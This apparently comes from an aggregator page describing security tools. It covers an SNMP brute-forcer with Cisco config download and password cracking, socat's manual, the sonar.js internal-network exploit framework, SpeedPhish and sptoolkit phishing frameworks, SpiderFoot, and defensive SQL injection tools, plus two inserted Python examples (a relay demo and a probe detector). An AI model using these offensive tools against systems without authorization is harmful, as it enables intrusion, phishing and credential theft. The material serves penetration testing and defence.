[+] Done!

Download Snitch
SNMP BRUTE - FAST SNMP BRUTE FORCE,
ENUMERATION, CISCO CONFIG DOWNLOADER AND
PASSWORD CRACKING SCRIPT
SNMP brute force, enumeration, CISCO config downloader and password cracking script. It listens for any responses to the brute-forced community strings, effectively minimising wait time.

Requirements

metasploit
snmpwalk
snmpstat
john the ripper

Usage

python snmp-brute.py -t [IP]

Options

--help, -h                        show this help message and exit
--file=DICTIONARY, -f DICTIONARY  Dictionary file
--target=IP, -t IP                Host IP
--port=PORT, -p PORT              SNMP port

Advanced

--rate=RATE, -r RATE  Send rate
--timeout=TIMEOUT     Wait time for UDP response (in seconds)
--delay=DELAY         Wait time after all packets are send (in seconds)
--iplist=LFILE        IP list file
--verbose, -v         Verbose output

Automation

--bruteonly, -b  Do not try to enumerate - only bruteforce
--auto, -a       Non Interactive Mode
--no-colours     No colour output

Operating Systems

--windows  Enumerate Windows OIDs (snmpenum.pl)
--linux    Enumerate Linux OIDs (snmpenum.pl)
--cisco    Append extra Cisco OIDs (snmpenum.pl)

Alternative Options

--stdin, -s                          Read communities from stdin
--community=COMMUNITY, -c COMMUNITY  Single Community String to use
--sploitego                          Sploitego's bruteforce method

Features

Brute forces both version 1 and version 2c SNMP community strings
Enumerates information for CISCO devices or, if specified, for Linux and Windows operating systems
Identifies RW community strings
Tries to download the router config (metasploit module)
If the CISCO config file is downloaded, shows the plaintext passwords (metasploit module) and tries to crack hashed passwords with John the Ripper

Download SNMP Brute
SOCAT - MULTIPURPOSE RELAY (SOCKET CAT)
Socat is a utility similar to the venerable Netcat that works over a number of protocols and through files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.
Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.
Filan is a utility that prints information about its active file descriptors to stdout. It has been written for debugging socat, but might be useful for other purposes too. Use the -h option to find more information.
Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.
The life cycle of a socat instance typically consists of four phases.
In the init phase, the command line options are parsed and logging is initialized.
During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.
In the transfer phase, socat watches both streams' read and write file descriptors via select(), and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.
When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.
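The transfer and closing phases described above, as an added Python sketch that is not socat's own code: select() on both streams, copy in blocks of at most the -b size, and on EOF half-close the other stream while letting the reverse direction drain for the -t timeout (or until it also hits EOF). run_demo() wires the relay between two socketpairs so each phase can be observed; socket names and the returned dict are this example's own.

```python
import select
import socket
import threading
import time


def relay(a, b, timeout=0.5, bufsize=8192, unidirectional=False):
    """Transfer and closing phases of a socat-style relay (added illustration).

    `a` and `b` are connected stream sockets. Whatever becomes readable on one
    side is written to the other in blocks of at most `bufsize` bytes (-b).
    When one side delivers EOF, only the *write* half of the other side is shut
    down; data keeps flowing in the remaining direction for up to `timeout`
    seconds (-t), or until that side delivers EOF too. `unidirectional=True`
    mirrors -u: `a` is only read and `b` is only written.
    Returns the byte counts moved in each direction.
    """
    routes = {a: b} if unidirectional else {a: b, b: a}   # source -> sink
    moved = {"a_to_b": 0, "b_to_a": 0}
    deadline = None                                       # armed on first EOF
    while routes:
        wait = None if deadline is None else max(0.0, deadline - time.monotonic())
        ready, _, _ = select.select(list(routes), [], [], wait)
        if not ready:                 # -t expired with nothing more to transfer
            break
        for src in ready:
            dst = routes[src]
            chunk = src.recv(bufsize)
            if chunk:
                dst.sendall(chunk)
                moved["a_to_b" if src is a else "b_to_a"] += len(chunk)
                continue
            # EOF on src: pass it on by half-closing dst, but keep reading dst.
            del routes[src]
            try:
                dst.shutdown(socket.SHUT_WR)
            except OSError:
                pass                                      # peer already gone
            if deadline is None:
                deadline = time.monotonic() + timeout
    for sock in (a, b):               # closing phase: tear down what is left
        sock.close()
    return moved


def run_demo(timeout=5.0):
    """Constructed exchange over two socketpairs (no real network involved).

    The relay sits between `left` and `right`; the returned dict records what
    each end observed in every phase.
    """
    left, left_relay = socket.socketpair()
    right_relay, right = socket.socketpair()
    moved = {}
    worker = threading.Thread(
        target=lambda: moved.update(relay(left_relay, right_relay, timeout=timeout)))
    worker.start()
    seen = {}
    left.sendall(b"hello")                          # transfer phase, a -> b
    seen["right_got"] = right.recv(64)
    right.sendall(b"world")                         # transfer phase, b -> a
    seen["left_got"] = left.recv(64)
    left.shutdown(socket.SHUT_WR)                   # EOF from the left...
    seen["right_saw_eof"] = right.recv(64) == b""   # ...is passed to the right
    right.sendall(b"late")                          # other direction still open
    seen["left_got_late"] = left.recv(64)
    right.close()                                   # second EOF: relay ends
    worker.join()
    seen["left_saw_eof"] = left.recv(64) == b""
    left.close()
    seen["moved"] = moved
    return seen


if __name__ == "__main__":
    print(run_demo())
```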
OPTIONS

Socat provides some command line options that modify the behaviour of the program. They have nothing to do with so-called address options that are used as parts of address specifications.

-V
Print version and available feature information to stdout, and exit.

-h | -?
Print a help text to stdout describing command line options and available address types, and exit.

-hh | -??
Like -h, plus a list of the short names of all available address options. Some options are platform dependent, so this output is helpful for checking the particular implementation.

-hhh | -???
Like -hh, plus a list of all available address option names.

-d
Without this option, only fatal and error messages are generated; applying this option also prints warning messages. See DIAGNOSTICS for more information.

-d -d
Prints fatal, error, warning, and notice messages.

-d -d -d
Prints fatal, error, warning, notice, and info messages.

-d -d -d -d
Prints fatal, error, warning, notice, info, and debug messages.

-D
Logs information about file descriptors before starting the transfer phase.

-ly[<facility>]
Writes messages to syslog instead of stderr; severity as defined with the -d option. With optional <facility>, the syslog type can be selected, default is "daemon". Third party libraries might not obey this option.

-lf <logfile>
Writes messages to <logfile> [filename] instead of stderr. Some third party libraries, in particular libwrap, might not obey this option.

-ls
Writes messages to stderr (this is the default). Some third party libraries might not obey this option, in particular libwrap appears to only log to syslog.

-lp<progname>
Overrides the program name printed in error messages and used for constructing environment variable names.

-lu
Extends the timestamp of error messages to microsecond resolution. Does not work when logging to syslog.

-lm[<facility>]
Mixed log mode. During startup messages are printed to stderr; when socat starts the transfer phase loop or daemon mode (i.e. after opening all streams and before starting data transfer, or, with listening sockets with fork option, before the first accept call), it switches logging to syslog. With optional <facility>, the syslog type can be selected, default is "daemon".

-lh
Adds hostname to log messages. Uses the value from environment variable HOSTNAME or the value retrieved with uname() if HOSTNAME is not set.

-v
Writes the transferred data not only to their target streams, but also to stderr. The output format is text with some conversions for readability, and prefixed with "> " or "< " indicating flow directions.

-x
Writes the transferred data not only to their target streams, but also to stderr. The output format is hexadecimal, prefixed with "> " or "< " indicating flow directions. Can be combined with -v.

-b<size>
Sets the data transfer block <size> [size_t]. At most <size> bytes are transferred per step. Default is 8192 bytes.

-s
By default, socat terminates when an error occurred to prevent the process from running when some option could not be applied. With this option, socat is sloppy with errors and tries to continue. Even with this option, socat will exit on fatals, and will abort connection attempts when security checks failed.

-t<timeout>
When one channel has reached EOF, the write part of the other channel is shut down. Then, socat waits <timeout> [timeval] seconds before terminating. Default is 0.5 seconds. This timeout only applies to addresses where write and read part can be closed independently. When during the timeout interval the read part gives EOF, socat terminates without awaiting the timeout.

-T<timeout>
Total inactivity timeout: when socat is already in the transfer loop and nothing has happened for <timeout> [timeval] seconds (no data arrived, no interrupt occurred...) then it terminates. Useful with protocols like UDP that cannot transfer EOF.

-u
Uses unidirectional mode. The first address is only used for reading, and the second address is only used for writing.

-U
Uses unidirectional mode in reverse direction. The first address is only used for writing, and the second address is only used for reading.

-g
During address option parsing, don't check if the option is considered useful in the given address environment. Use it if you want to force, e.g., application of a socket option to a serial device.

-L<lockfile>
If lockfile exists, exits with error. If lockfile does not exist, creates it and continues, unlinks lockfile on exit.

-W<lockfile>
If lockfile exists, waits until it disappears. When lockfile does not exist, creates it and continues, unlinks lockfile on exit.

-4
Use IP version 4 in case that the addresses do not implicitly or explicitly specify a version; this is the default.

-6
Use IP version 6 in case that the addresses do not implicitly or explicitly specify a version.

Download Socat
SOFTAVIR - ANTIVIRUS FOR WINDOWS BASED ON WHITELISTS

SoftAvir is a security tool that ensures complete protection for your computer by creating a whitelist. The user selects the only programs that can be run, avoiding in this way the execution of any other unwanted program.

How does it work?

Softavir is the first antimalware solution that relies on advanced cryptographic whitelisting technology. After it is installed, the user must add the programs that can be run. Softavir will not allow the execution of any program that has not been added to the list (including viruses, trojans and other malware).

Who is it for?

Softavir is recommended to Microsoft Windows users. The current version is compatible with Microsoft Windows x86 operating systems. A version for Microsoft Windows x64 operating systems will come out soon.

Main advantages:

100% protection against new threats.
Does not require updates.
Improved software management.
Easy maintenance of your equipment.
Avoids the need of regular formatting.

Download Softavir
SONAR.JS - FRAMEWORK FOR IDENTIFYING AND LAUNCHING EXPLOITS AGAINST INTERNAL NETWORK HOSTS

A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration, WebSocket host scanning, and external resource fingerprinting.

How does it work?

Upon loading the sonar.js payload in a modern web browser the following will happen:

sonar.js will use WebRTC to enumerate what internal IPs the user loading the payload has.
sonar.js then attempts to find live hosts on the internal network via WebSockets.
If a live host is found, sonar.js begins to attempt to fingerprint the host by linking to it via <img src="x"> and <link rel="stylesheet" type="text/css" href="x"> and hooking the onload event. If the expected resources load successfully it will trigger the pre-set JavaScript callback to start the user-supplied exploit.
If the user changes networks, sonar.js starts the process all over again on the newly joined network.

Fingerprints

sonar.js works off of a database of fingerprints. A fingerprint is simply a list of known resources on a device that can be linked to and detected via onload. Examples of this include images, CSS stylesheets, and even external JavaScript.
An example fingerprint database can be seen below:
var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png", "/images/loading.gif", "/images/alertImg.png", "/images/New_ui/networkmap/line_one.png", "/images/New_ui/networkmap/lock.png", "/images/New_ui/networkmap/line_two.png", "/index_style.css", "/form_style.css", "/NM_style.css", "/other.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
    {
        'name': "Linksys WRT54G",
        'fingerprints': ["/UILinksys.gif", "/UI_10.gif", "/UI_07.gif", "/UI_06.gif", "/UI_03.gif", "/UI_02.gif", "/UI_Cisco.gif", "/style.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
]

The above database contains fingerprints for two devices, the ASUS RT-N66U WiFi router and the Linksys WRT54G WiFi router.
Each database entry has the following:

name: A field to identify what device the fingerprint is for. This could be something like HP Officejet 4500 printer or Linksys WRT54G Router.
fingerprints: This is an array of relative links to resources such as CSS stylesheets, images, or even JavaScript files. If you expect these resources to be on a non-standard port such as 8080, set the resource with the port included: :8080/unique.css. Keep in mind using external resources with active content such as JavaScript is dangerous as it can interrupt the regular flow of execution.
callback: If all of these resources are found to exist on the enumerated host then the callback function is called with a single argument of the device's IP address.

By creating your own fingerprints you can build custom exploits that will be launched against internal devices once they are detected by sonar.js. Common exploits include things such as Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. The idea being that you can use these vulnerabilities to do things such as modifying router DNS configurations, dumping files from an internal fileserver, and more.
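Seen from the device owner's side, the same fingerprint list can drive a detection. The following added example (not part of sonar.js) scans a router's access log for a client that, steered by a page from another origin, requests several fingerprint resources within a few seconds; the log lines are constructed, and own_hosts (the router's own names and addresses) is an assumed parameter.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Resource paths copied from the sonar.js fingerprint database shown above.
FINGERPRINTS = {
    "ASUS RT-N66U": [
        "/images/New_ui/asustitle.png", "/images/loading.gif", "/images/alertImg.png",
        "/images/New_ui/networkmap/line_one.png", "/images/New_ui/networkmap/lock.png",
        "/images/New_ui/networkmap/line_two.png", "/index_style.css", "/form_style.css",
        "/NM_style.css", "/other.css",
    ],
    "Linksys WRT54G": [
        "/UILinksys.gif", "/UI_10.gif", "/UI_07.gif", "/UI_06.gif", "/UI_03.gif",
        "/UI_02.gif", "/UI_Cisco.gif", "/style.css",
    ],
}

# Combined log format (client, timestamp, request line, status, size, Referer, UA).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')

# Constructed sample: 192.168.1.50 is driven by an external page, 192.168.1.20 is
# an admin using the router's own UI, 192.168.1.77 fetches one cross-origin file.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2016:20:01:02 +0000] "GET /index_style.css HTTP/1.1" 200 812 "http://attacker.example/landing.html" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2016:20:01:02 +0000] "GET /form_style.css HTTP/1.1" 200 403 "http://attacker.example/landing.html" "Mozilla/5.0"
192.168.1.20 - - [10/Mar/2016:20:01:03 +0000] "GET /index_style.css HTTP/1.1" 200 812 "http://192.168.1.1/index.asp" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2016:20:01:03 +0000] "GET /NM_style.css HTTP/1.1" 200 1290 "http://attacker.example/landing.html" "Mozilla/5.0"
192.168.1.77 - - [10/Mar/2016:20:01:04 +0000] "GET /other.css HTTP/1.1" 200 77 "http://news.example/article" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2016:20:01:04 +0000] "GET /other.css HTTP/1.1" 200 77 "http://attacker.example/landing.html" "Mozilla/5.0"
192.168.1.20 - - [10/Mar/2016:20:01:09 +0000] "GET /index.asp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one log line, or None when it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = urlsplit(rec["target"]).path      # drop any query string
    return rec


def referer_host(referer):
    """Host of the page that issued the request, or None when not logged."""
    if not referer or referer == "-":
        return None
    return urlsplit(referer).hostname


def detect_probes(log_text, own_hosts, window_seconds=10, min_paths=3):
    """Flag (client, device) pairs that fetched `min_paths` distinct fingerprint
    resources within `window_seconds`, each driven by a page hosted elsewhere."""
    by_path = defaultdict(list)
    for device, paths in FINGERPRINTS.items():
        for path in paths:
            by_path[path].append(device)
    events = defaultdict(list)                      # (client, device) -> hits
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] not in by_path:
            continue
        origin = referer_host(rec["referer"])
        if origin is None or origin in own_hosts:
            continue                                # same-origin or direct use
        for device in by_path[rec["path"]]:
            events[(rec["ip"], device)].append((rec["ts"], rec["path"], origin))
    findings = []
    for (client, device), hits in sorted(events.items()):
        hits.sort()
        for start, _, _ in hits:                    # sliding window over hits
            in_window = [h for h in hits
                         if 0 <= (h[0] - start).total_seconds() <= window_seconds]
            paths = sorted({h[1] for h in in_window})
            if len(paths) >= min_paths:
                findings.append({"client": client, "device": device, "paths": paths,
                                 "referers": sorted({h[2] for h in in_window})})
                break
    return findings


if __name__ == "__main__":
    for f in detect_probes(SAMPLE_LOG, own_hosts={"192.168.1.1", "router.local"}):
        print(f"{f['client']} probed for {f['device']} via {f['referers']}: {f['paths']}")
```

Browsers may omit or trim the Referer, so an empty field is a blind spot rather than a clean bill; the same cross-origin pattern is also what a CSRF attempt against the admin UI looks like, which makes it worth alerting on either way.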
For an easier way to create fingerprints, see the Chrome extension which generates fingerprint template code automatically for the page you're on.

What can be done using sonar.js?

By using sonar.js a pentesting team can build web exploits against things such as internal logging servers, routers, printers, VOIP phones, and more. Due to internal networks often being less guarded, attacks such as CSRF and XSS can be powerful to take over the configurations of devices on a host's internal network.

Download Sonar.js
SPARKYLINUX - LIGHTWEIGHT & FAST DEBIAN-BASED LINUX DISTRIBUTION

SparkyLinux is a GNU/Linux distribution created on the testing branch of Debian. It features customized lightweight desktops (like E19, LXDE and Openbox), multimedia plugins, selected sets of apps and its own custom tools to ease different tasks.

Why Sparky?

SparkyLinux is a Debian-based Linux distribution which provides a ready to use, out of the box operating system with a set of slightly customized lightweight desktops.
Sparky is targeted at all computer users who want to replace an existing, proprietary OS with an open-source one.
Sparky is also targeted at two different groups of users:

Full Editions with all the tools, codecs, plugins and drivers preinstalled, for users who want to have everything ready and working from the first system run
Base Editions with a minimal set of tools, for advanced users who like to set up everything as they want

Main features of Sparky

Debian testing based
rolling release
lightweight, fast & simple
set of desktops to choose: LXDE, Enlightenment, JWM, KDE, LXQt, Openbox, MATE, Xfce
ultra light base edition with Openbox or JWM desktops
special gaming edition: GameOver
CLI Edition (no X) for building a customized desktop
most wireless and mobile network cards supported
set of selected applications, multimedia codecs and plugins
own repository with a large set of additional applications
easy hard drive / USB installation

In general, Sparky is not targeted at Linux beginners, rather at users with some amount of Linux knowledge. Anyway, Linux beginners are welcome too; our forums are open for any question.

Download SparkyLinux
SPARTA - NETWORK INFRASTRUCTURE PENETRATION TESTING TOOL

SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analysing results.

Features

Run nmap from SPARTA or import nmap XML output.
Transparent staged nmap: get results quickly and achieve thorough coverage.
Configurable context menu for each service. You can configure what to run on discovered services. Any tool that can be run from a terminal can be run from SPARTA.
You can run any script or tool on a service across all the hosts in scope, just with a click of the mouse.
Define automated tasks for services (i.e. run nikto on every HTTP service, or sslscan on every SSL service).
Default credentials check for most common services. Of course, this can also be configured to run automatically.
Identify password reuse on the tested infrastructure. If any usernames/passwords are found by Hydra they are stored in internal wordlists which can then be used on other targets in the same network (breaking news: sysadmins reuse passwords).
Ability to mark hosts that you have already worked on so that you don't waste time looking at them again.
Website screenshot taker so that you don't waste time on less interesting web servers.

Download SPARTA
SPEEDTEST - COMMAND LINE INTERFACE FOR TESTING INTERNET BANDWIDTH

speedtest-cli is a command line interface for testing internet bandwidth using speedtest.net

Installation

pip / easy_install

pip install speedtest-cli

or

easy_install speedtest-cli

Github

pip install git+https://github.com/sivel/speedtest-cli.git

or

git clone https://github.com/sivel/speedtest-cli.git
python speedtest-cli/setup.py install

Just download (Like the way it used to be)

wget -O speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli

or

curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli

Usage

$ speedtest-cli -h
usage: speedtest-cli [-h] [--bytes] [--share] [--simple] [--list]
                     [--server SERVER] [--mini MINI] [--source SOURCE]
                     [--timeout TIMEOUT] [--version]

Command line interface for testing internet bandwidth using speedtest.net.
--------------------------------------------------------------------------
https://github.com/sivel/speedtest-cli

optional arguments:
  -h, --help         show this help message and exit
  --bytes            Display values in bytes instead of bits. Does not affect the image generated by --share
  --share            Generate and provide a URL to the speedtest.net share results image
  --simple           Suppress verbose output, only show basic information
  --list             Display a list of speedtest.net servers sorted by distance
  --server SERVER    Specify a server ID to test against
  --mini MINI        URL of the Speedtest Mini server
  --source SOURCE    Source IP address to bind to
  --timeout TIMEOUT  HTTP timeout in seconds. Default 10
  --version          Show the version number and exit

Download Speedtest
SPF - SPEEDPHISH FRAMEWORK

SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

Requirements:

dnspython
twisted
PhantomJS

Usage:

usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [--all] [--test] [-e]
              [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
              [-c <company's name>] [--ip <IP address>] [-v] [-y]

optional arguments:
  -h, --help           show this help message and exit
  -d <domain>          domain name to phish
  -c <company's name>  name of company to phish
  --ip <IP address>    IP of webserver defaults to [192.168.1.124]
  -v, --verbosity      increase output verbosity

input files:
  -f <list.txt>        file containing list of email addresses
  -C <config.txt>      config file

enable flags:
  --all                enable ALL flags... same as (-e -g -s -w)
  --test               enable all flags EXCEPT sending of emails... same as (-e -g --simulate -w -y -v -v)
  -e                   enable external tool utilization
  -g                   enable automated gathering of email targets
  -s                   enable automated sending of phishing emails to targets
  --simulate           simulate the sending of phishing emails to targets
  -w                   enable generation of phishing web sites
  -W                   leave web server running after termination of spf.py

misc:
  -y                   automatically answer yes to all questions

Execution:

cd spf
python spf.py --test -d example.com

or to just test the websites:

cd spf
python web.py default.cfg
Misc

Video of sample usage


BsidesKnox 2015 video


Download SpeedPhish Framework


SPIDERFOOT V2.6.1 - OPEN SOURCE INTELLIGENCE AUTOMATION

SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target.

Purpose

There are three main areas where SpiderFoot can be useful:

1. If you are a pen-tester, SpiderFoot will automate the reconnaissance stage of the test, giving you a rich set of data to help you pin-point areas of focus for the test.
2. Understand what your network/organisation is openly exposing to the outside world. Such information in the wrong hands could be a significant risk.
3. SpiderFoot can also be used to gather threat intelligence about suspected malicious IPs you might be seeing in your logs or have obtained via threat intelligence data feeds.

Features

Utilises a shedload of data sources; over 40 so far and counting, including SHODAN, RIPE, Whois, PasteBin, Google, SANS and more.
Designed for maximum data extraction; every piece of data is passed on to modules that may be interested, so that they can extract valuable information. No piece of discovered data is saved from analysis.
Runs on Linux and Windows. And fully open-source so you can fork it on GitHub and do whatever you want with it.
Visualisations. Built-in JavaScript-based visualisations or export to GEXF/CSV for use in other tools, like Gephi for instance.
Web-based UI. No cumbersome CLI or Java to mess with. Easy to use, easy to navigate. Take a look through the gallery for screenshots.
Highly configurable. Almost every module is configurable so you can define the level of intrusiveness and functionality.
Modular. Each major piece of functionality is a module, written in Python. Feel free to write your own and submit them to be incorporated!
SQLite back-end. All scan results are stored in a local SQLite database, so you can play with your data to your heart's content.
Simultaneous scans. Each footprint scan runs as its own thread, so you can perform footprinting of many different targets simultaneously.
So much more... check out the documentation for more information.
Data Sources

This is an ever-growing list of data sources SpiderFoot uses to gather intelligence about your target. A few require API keys but they are freely available.

Source | Location | Notes
abuse.ch | http://www.abuse.ch | Various malware trackers.
AdBlock | https://easylistdownloads.adblockplus.org/easylist.txt | AdBlock pattern matches
AlienVault | https://reputation.alienvault.com | AlienVault's IP reputation database.
Autoshun.org | http://www.autoshun.org | Blacklists.
AVG Site Safety Report | http://www.avgthreatlabas.com | Site safety checker.
Bing | http://www.bing.com | Scraping but future version to also use API.
Blocklist.de | http://lists.blocklist.de | Blacklists.
Checkusernames.com | http://www.checkusernames.com | Look up username availability on popular sites.
DNS | Your configured DNS server. | Defaults to your local DNS but can be configured to whatever IP address you supply SpiderFoot.
DomainTools | http://www.domaintools.com |
DroneBL | http://www.dronebl.org |
DuckDuckGo | http://www.duckduckgo.com |
Facebook | http://www.facebook.com | Scraping but future version to also use API.
FreeGeoIP | http://freegeoip.net |
Github | http://www.github.com |
Google | http://www.google.com | Scraping but future version to also use API.
Google+ | http://plus.google.com | Scraping but future version to also use API.
Google Safe Browsing | http://www.google.com/safebrowsing | Site safety checker.
IPCat | https://raw.githubusercontent.com/client9/ipcat/master/datacenters.csv | IP Categorisation.
LinkedIn | http://www.linkedin.com | Scraping but future version to also use API.
malc0de.com | http://malc0de.com | Blacklists.
malwaredomainlist.com | http://www.malwaredomainlist.com | Blacklists.
malwaredomains.com | http://www.malwaredomains.com | Blacklists.
McAfee SiteAdvisor | http://www.siteadvisor.com | Site safety checker.
NameDroppers | http://www.namedroppers.org |
Notepad.cc | http://www.notepad.cc |
Nothink.org | http://www.nothink.org | Blacklists.
Onion.City | http://onion.city | Search engine for the dark web.
OpenBL | http://www.openbl.org | Blacklists.
PasteBin | http://www.pastebin.com | Achieved through Google scraping.
Pastie | http://www.pastie.org |
PGP Servers | http://pgp.mit.edu/pks/ | PGP public keys.
PhishTank | http://www.phishtank.org | Identified phishing sites.
Project Honeypot | http://www.projecthoneypot.org | Blacklists. API key needed.
PunkSPIDER | http://www.punkspider.org |
RIPE/ARIN | http://stat.ripe.net/ |
Robtex | http://www.robtex.com |
SANS ISC | http://isc.sans.edu | Internet Storm Center IP reputation database.
SHODAN | http://www.shodanhq.com | API key needed.
SORBS | http://www.sorbs.net | Blacklists.
SpamHaus | http://www.spamhaus.org | Blacklists.
ThreatExpert | http://www.threatexpert.com | Blacklists.
TOR Node List | http://torstatus.blutmagie.de |
TotalHash.com | http://www.totalhash.com | Domains/IPs used by malware.
UCEPROTECT | http://www.uceprotect.net | Blacklists.
VirusTotal | http://www.virustotal.com | Domains/IPs used by malware. API key needed.
WayBack Machine | http://www.archive.org |
Whois | Various | Whois servers for different TLDs.
XSSposed | http://www.xssposed.org |
Yahoo | http://www.yahoo.com | Scraping but future version to also use API.
Zone-H | http://www.zone-h.org | Easy to get blacklisted. Log onto the site in a browser from the IP you're scanning from first and enter the CAPTCHA, then it should be fine.

Download SpiderFoot v2.6.1


SPTOOLKIT REBIRTH - PHISHING EDUCATION TOOLKIT

The spt (rebirth) project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the undertrained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. The link is clicked, the deed is done.
spt was developed from the ground up to provide a simple and easy to use framework to identify your weakest links so that you can patch the human vulnerability. If the spt project sounds interesting to you, please consider downloading it for evaluation in your own organization. Feedback is welcomed and always appreciated.

INSTALLATION

The Basics

1. Create and configure the MySQL database. spt will need a MySQL database to house its data, so go ahead and create that database and configure the associated user account for the new database with ALL PRIVILEGES assigned to it. Be sure you record the database name, user name and password in a safe place, you'll need it soon to install spt!
2. Ensure you have PHP 5.4
3. Extract the spt files from the archive.
4. Create a new directory on your web server, such as "spt" and upload the files to the directory.

Install spt

1. Open your web browser and navigate to the location where you uploaded the files and browse to install.php. For example, http://www.myhost.com/spt/install.php. If you accidentally just go to the root of the folder you placed the files in, you will be prompted to start the installation by clicking the right pointing arrow.
2. When prompted to accept the GNU General Public License, click the "I Agree!" button. For reference, you can read the full text of the license in the license.htm file included in the root of the extracted files.
3. On the next page, you will get feedback on the readiness of your server to install the spt. You can learn more about any failed items by hovering over the icon. Click the Proceed! button if all checks passed, or click the Proceed Anyways button if one of the checks failed and you have verified that the spt installer is reporting incorrectly.
4. On the next page, you will need to provide those database details from earlier. The default server and database ports are provided, be sure to change them if your installation will require something else. Enter in the remaining required information and click the "Install Database!" button to get things moving along.
5. If all goes well, you will see a listing of tables that have been successfully created. Click "Continue!" to move on.
6. If instead you see an error indicated, click the "<back" button to go back and enter the database information again.
7. Now it's time to create your first user, for you! Enter your first and last name, email address and password and click the "Create User" button to continue on.
8. If you receive any errors, such as for an invalid email address or a password that does not meet the complexity requirements, click the "<back" button and try it again.
9. Once you enter the required information successfully, you will receive confirmation. Click the "Proceed to Login" button to get logged into the spt!
10. Now it's time to login using the email address and password you entered in the previous step. See, that was easy!

Download Sptoolkit Rebirth
SQLASSIE - EFFECTIVE DATABASE SECURITY

SQLassie is a free MySQL database firewall that prevents SQL injection attacks at runtime. SQLassie uses Bayesian classifiers to determine the likelihood of a query being an attack. This approach produces fewer false positives than other similar approaches.

Security
SQLassie prevents injection attacks before they have a chance to run.
Instantaneous
Protection is instantaneous: just point your web applications at SQLassie and you're done!
Analysis
SQLassie tracks suspicious queries, classifies them based on their intent, and logs this information for further review.
Options
SQLassie can be used as a passive intrusion detection system or as an active intrusion prevention system.
Support
SQLassie is free and being constantly updated and improved. Have a problem or feature request? Let us know!

Usage

SQLassie currently only supports MySQL. To start SQLassie, you'll need to configure how SQLassie connects to the MySQL server, start SQLassie listening on a different port that is now protected, and then configure your applications to connect through this alternate port instead of directly to MySQL.
As an example, consider a scenario where you have a MySQL database engine running and listening for connections on the domain socket /var/run/mysql/mysqld.sock and are running a MediaWiki installation.
First, start SQLassie using
./sqlassie -s /var/run/mysql/mysqld.sock -l 3307

Then, edit MediaWiki's configuration file LocalSettings.php to connect to port 3307:
$wgDBServer = "127.0.0.1:3307";

Note that you can't use localhost here; by default, MySQL interprets localhost as a request to use the direct database domain socket connection, and most web applications behave this way as well. Therefore, you have to use the explicit string 127.0.0.1 in order to force connections to go through the TCP port. Check your application's documentation for more information.

Download SQLassie
SQLCHOP - SQL INJECTION DETECTION ENGINE

SQLChop is a novel SQL injection detection engine built on top of SQL tokenizing and syntax analysis. Web input (URLPath, body, cookie, etc.) is first decoded to the raw payloads that the web app accepts, then syntactical analysis is performed on each payload to classify the result. The algorithm behind SQLChop is based on compiler knowledge and automata theory, and runs at a time complexity of O(N).

Documentation

http://sqlchop.chaitin.com/doc.html

Dependencies

The SQLChop alpha testing release includes the C++ header and shared object, a Python library, and also some sample usages. The release has been tested on most Linux distributions.
If using Python, you need to install protobuf-python, e.g.:
$ sudo pip install protobuf

If using C++, you need to install protobuf, protobuf-compiler and protobuf-devel, e.g.:
$ sudo yum install protobuf protobuf-compiler protobuf-devel

Build

Download the latest release at https://github.com/chaitin/sqlchop/releases
Make
Run python2 test.py or LD_LIBRARY_PATH=./ ./sqlchop_test

